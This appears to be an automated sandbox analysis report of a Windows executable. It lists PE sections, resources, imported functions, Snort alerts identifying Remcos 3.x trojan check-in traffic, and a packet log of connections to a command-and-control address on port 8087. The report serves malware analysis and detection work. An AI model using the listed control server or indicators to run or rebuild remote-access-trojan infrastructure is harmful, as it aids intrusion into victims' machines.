IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xfa6d4	0x5bc	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x545d0	0x54600	f2869d94df0bc4b5c9f68cbe21100a36	False	0.533449074074074	data	6.552245149979875	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.itext	0x56000	0x3c30	0x3e00	9969142d79755c5d4c986dc0d53a2b1f	False	0.3204385080645161	data	5.3862884705690455	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x5a000	0x9bee8	0x9c000	0fca2d995f5345fc497063415f1ff162	False	0.2847086588541667	data	4.854723643620289	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.bss	0xf6000	0x36d8	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0xfa000	0x24c2	0x2600	3202feb204b7063cadb7acc0cc7d190d	False	0.3157894736842105	data	5.103212972887659	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0xfd000	0x34	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0xfe000	0x18	0x200	16238ec10a9dfd02293517ab322daca9	False	0.05078125	data	0.2108262677871819	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xff000	0x632c	0x6400	b05e294ce63e667f2d2ba03a4de4ef1f	False	0.6606640625	data	6.694570612418228	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.rsrc	0x106000	0x10200	0x10200	ad69ddcd7af50804b96e5839c1f0fb1d	False	0.291999757751938	data	5.524860232359683	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_CURSOR	0x106dc0	0x134	Targa image data - Map 64 x 65536 x 1 +32 "\001"	English	United States	0.38636363636363635
RT_CURSOR	0x106ef4	0x134	data	English	United States	0.4642857142857143
RT_CURSOR	0x107028	0x134	data	English	United States	0.4805194805194805
RT_CURSOR	0x10715c	0x134	data	English	United States	0.38311688311688313
RT_CURSOR	0x107290	0x134	data	English	United States	0.36038961038961037
RT_CURSOR	0x1073c4	0x134	data	English	United States	0.4090909090909091
RT_CURSOR	0x1074f8	0x134	Targa image data - RGB 64 x 65536 x 1 +32 "\001"	English	United States	0.4967532467532468
RT_BITMAP	0x10762c	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.43103448275862066
RT_BITMAP	0x1077fc	0x1e4	Device independent bitmap graphic, 36 x 19 x 4, image size 380	English	United States	0.46487603305785125
RT_BITMAP	0x1079e0	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.43103448275862066
RT_BITMAP	0x107bb0	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.39870689655172414
RT_BITMAP	0x107d80	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.4245689655172414
RT_BITMAP	0x107f50	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.5021551724137931
RT_BITMAP	0x108120	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.5064655172413793
RT_BITMAP	0x1082f0	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.39655172413793105
RT_BITMAP	0x1084c0	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.5344827586206896
RT_BITMAP	0x108690	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.39655172413793105
RT_BITMAP	0x108860	0xc0	Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colors	English	United States	0.5208333333333334
RT_BITMAP	0x108920	0xe0	Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors	English	United States	0.42857142857142855
RT_BITMAP	0x108a00	0xe0	Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors	English	United States	0.4955357142857143
RT_BITMAP	0x108ae0	0xe0	Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors	English	United States	0.38392857142857145
RT_BITMAP	0x108bc0	0xc0	Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colors	English	United States	0.4947916666666667
RT_BITMAP	0x108c80	0xc0	Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colors	English	United States	0.484375
RT_BITMAP	0x108d40	0xe0	Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors	English	United States	0.42410714285714285
RT_BITMAP	0x108e20	0xc0	Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colors	English	United States	0.5104166666666666
RT_BITMAP	0x108ee0	0xe0	Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors	English	United States	0.5
RT_BITMAP	0x108fc0	0xe8	Device independent bitmap graphic, 16 x 16 x 4, image size 128	English	United States	0.4870689655172414
RT_BITMAP	0x1090a8	0xc0	Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colors	English	United States	0.4895833333333333
RT_BITMAP	0x109168	0xe0	Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors	English	United States	0.3794642857142857
RT_ICON	0x109248	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 3779 x 3779 px/m			0.48592870544090055
RT_ICON	0x10a2f0	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 3779 x 3779 px/m			0.2872579121398205
RT_ICON	0x10e518	0x5488	Device independent bitmap graphic, 72 x 144 x 32, image size 20736, resolution 3779 x 3779 px/m			0.25235674676524955
RT_DIALOG	0x1139a0	0x52	data			0.7682926829268293
RT_DIALOG	0x1139f4	0x52	data			0.7560975609756098
RT_STRING	0x113a48	0x34	data			0.5
RT_STRING	0x113a7c	0x2b0	data			0.4752906976744186
RT_STRING	0x113d2c	0xb8	data			0.6793478260869565
RT_STRING	0x113de4	0xec	data			0.6398305084745762
RT_STRING	0x113ed0	0x2f0	data			0.4587765957446808
RT_STRING	0x1141c0	0x3d0	data			0.38729508196721313
RT_STRING	0x114590	0x370	data			0.4022727272727273
RT_STRING	0x114900	0x3cc	data			0.33539094650205764
RT_STRING	0x114ccc	0x214	data			0.49624060150375937
RT_STRING	0x114ee0	0xcc	data			0.6274509803921569
RT_STRING	0x114fac	0x194	data			0.5643564356435643
RT_STRING	0x115140	0x3c4	data			0.3288381742738589
RT_STRING	0x115504	0x338	data			0.42961165048543687
RT_STRING	0x11583c	0x294	data			0.42424242424242425
RT_RCDATA	0x115ad0	0x10	data			1.5
RT_RCDATA	0x115ae0	0x2cc	data			0.7276536312849162
RT_RCDATA	0x115dac	0x38b	Delphi compiled form 'TForm1'			0.5854465270121278
RT_GROUP_CURSOR	0x116138	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.25
RT_GROUP_CURSOR	0x11614c	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.25
RT_GROUP_CURSOR	0x116160	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x116174	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x116188	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x11619c	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x1161b0	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_ICON	0x1161c4	0x30	data			0.9583333333333334

Imports

DLL	Import
oleaut32.dll	SysFreeString, SysReAllocStringLen, SysAllocStringLen
advapi32.dll	RegQueryValueExA, RegOpenKeyExA, RegCloseKey
user32.dll	GetKeyboardType, DestroyWindow, LoadStringA, MessageBoxA, CharNextA
kernel32.dll	GetACP, Sleep, VirtualFree, VirtualAlloc, GetTickCount, QueryPerformanceCounter, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, CompareStringA, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
kernel32.dll	TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
user32.dll	CreateWindowExA, WindowFromPoint, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, SetWindowsHookExA, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageW, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageW, PeekMessageA, OffsetRect, OemToCharA, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageW, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessagePos, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameA, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClientRect, GetClassLongA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageW, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
gdi32.dll	UnrealizeObject, StretchBlt, SetWindowOrgEx, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, RectVisible, RealizePalette, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectA, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, ExcludeClipRect, DeleteObject, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, BitBlt
version.dll	VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
kernel32.dll	lstrcpyA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualAlloc, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MulDiv, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalFindAtomA, GlobalDeleteAtom, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetStdHandle, GetProcAddress, GetModuleHandleW, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCPInfo, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
advapi32.dll	RegQueryValueExA, RegOpenKeyExA, RegFlushKey, RegCloseKey
kernel32.dll	Sleep
oleaut32.dll	SafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
comctl32.dll	_TrackMouseEvent, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
05/15/24-01:59:19.345728	TCP	2032777	ET TROJAN Remcos 3.x Unencrypted Server Response	8087	49707	107.175.229.139	192.168.2.5
05/15/24-01:56:51.986638	TCP	2032776	ET TROJAN Remcos 3.x Unencrypted Checkin	49707	8087	192.168.2.5	107.175.229.139

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 15, 2024 01:56:47.594306946 CEST	49704	443	192.168.2.5	13.107.139.11
May 15, 2024 01:56:47.594340086 CEST	443	49704	13.107.139.11	192.168.2.5
May 15, 2024 01:56:47.594419003 CEST	49704	443	192.168.2.5	13.107.139.11
May 15, 2024 01:56:47.595169067 CEST	49704	443	192.168.2.5	13.107.139.11
May 15, 2024 01:56:47.595213890 CEST	443	49704	13.107.139.11	192.168.2.5
May 15, 2024 01:56:47.595272064 CEST	49704	443	192.168.2.5	13.107.139.11
May 15, 2024 01:56:47.615396023 CEST	49705	443	192.168.2.5	13.107.139.11
May 15, 2024 01:56:47.615427017 CEST	443	49705	13.107.139.11	192.168.2.5
May 15, 2024 01:56:47.615500927 CEST	49705	443	192.168.2.5	13.107.139.11
May 15, 2024 01:56:47.617044926 CEST	49705	443	192.168.2.5	13.107.139.11
May 15, 2024 01:56:47.617058039 CEST	443	49705	13.107.139.11	192.168.2.5
May 15, 2024 01:56:48.040909052 CEST	443	49705	13.107.139.11	192.168.2.5
May 15, 2024 01:56:48.040993929 CEST	49705	443	192.168.2.5	13.107.139.11
May 15, 2024 01:56:48.151360035 CEST	49705	443	192.168.2.5	13.107.139.11
May 15, 2024 01:56:48.151380062 CEST	443	49705	13.107.139.11	192.168.2.5
May 15, 2024 01:56:48.151612997 CEST	443	49705	13.107.139.11	192.168.2.5
May 15, 2024 01:56:48.195873976 CEST	49705	443	192.168.2.5	13.107.139.11
May 15, 2024 01:56:48.594052076 CEST	49705	443	192.168.2.5	13.107.139.11
May 15, 2024 01:56:48.640120029 CEST	443	49705	13.107.139.11	192.168.2.5
May 15, 2024 01:56:49.333432913 CEST	443	49705	13.107.139.11	192.168.2.5
May 15, 2024 01:56:49.333492041 CEST	443	49705	13.107.139.11	192.168.2.5
May 15, 2024 01:56:49.333549023 CEST	49705	443	192.168.2.5	13.107.139.11
May 15, 2024 01:56:49.336283922 CEST	49705	443	192.168.2.5	13.107.139.11
May 15, 2024 01:56:49.336304903 CEST	443	49705	13.107.139.11	192.168.2.5
May 15, 2024 01:56:49.336318016 CEST	49705	443	192.168.2.5	13.107.139.11
May 15, 2024 01:56:49.336323023 CEST	443	49705	13.107.139.11	192.168.2.5
May 15, 2024 01:56:51.813189030 CEST	49707	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:51.986087084 CEST	8087	49707	107.175.229.139	192.168.2.5
May 15, 2024 01:56:51.986160040 CEST	49707	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:51.986638069 CEST	49707	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:52.206780910 CEST	8087	49707	107.175.229.139	192.168.2.5
May 15, 2024 01:56:52.415472984 CEST	8087	49707	107.175.229.139	192.168.2.5
May 15, 2024 01:56:52.470875025 CEST	49707	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:52.510979891 CEST	49707	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:52.643304110 CEST	8087	49707	107.175.229.139	192.168.2.5
May 15, 2024 01:56:52.650011063 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:52.691862106 CEST	49707	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:52.737027884 CEST	8087	49707	107.175.229.139	192.168.2.5
May 15, 2024 01:56:52.823874950 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:52.823945045 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:52.829910040 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:52.863061905 CEST	49709	80	192.168.2.5	178.237.33.50
May 15, 2024 01:56:53.006462097 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.006491899 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.006504059 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.006516933 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.006529093 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.006567955 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.006577015 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.006582022 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.006614923 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.006618023 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.006630898 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.006643057 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.006659031 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.006684065 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.093723059 CEST	80	49709	178.237.33.50	192.168.2.5
May 15, 2024 01:56:53.093895912 CEST	49709	80	192.168.2.5	178.237.33.50
May 15, 2024 01:56:53.131319046 CEST	49709	80	192.168.2.5	178.237.33.50
May 15, 2024 01:56:53.179215908 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.179234982 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.179248095 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.179269075 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.179303885 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.179317951 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.179331064 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.179332972 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.179372072 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.179428101 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.179440975 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.179455996 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.179469109 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.179481030 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.179481030 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.179491997 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.179502964 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.179508924 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.179514885 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.179527044 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.179527998 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.179547071 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.179558039 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.179593086 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.179598093 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.179606915 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.179617882 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.179630041 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.179658890 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.179675102 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.351762056 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.351799965 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.351813078 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.351824999 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.351839066 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.351850033 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.351865053 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.351871967 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.351877928 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.351891994 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.351903915 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.351934910 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.351958036 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.351969957 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.351979971 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.351990938 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.351996899 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.352004051 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.352015972 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.352025986 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.352027893 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.352040052 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.352051020 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.352068901 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.352070093 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.352082014 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.352117062 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.352148056 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.352161884 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.352171898 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.352183104 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.352190971 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.352195024 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.352205992 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.352210045 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.352216959 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.352229118 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.352233887 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.352241039 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.352251053 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.352252960 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.352263927 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.352284908 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.352287054 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.352299929 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.352310896 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.352312088 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.352324009 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.352339983 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.352343082 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.352354050 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.352365971 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.352379084 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.352380037 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.352389097 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.352406979 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.352411985 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.352430105 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.352447987 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.365603924 CEST	80	49709	178.237.33.50	192.168.2.5
May 15, 2024 01:56:53.365694046 CEST	49709	80	192.168.2.5	178.237.33.50
May 15, 2024 01:56:53.524264097 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.524367094 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.524379969 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.524391890 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.524403095 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.524410963 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.524415970 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.524429083 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.524430990 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.524440050 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.524451017 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.524463892 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.524476051 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.524482965 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.524487972 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.524498940 CEST	8087	49708	107.175.229.139	192.168.2.5
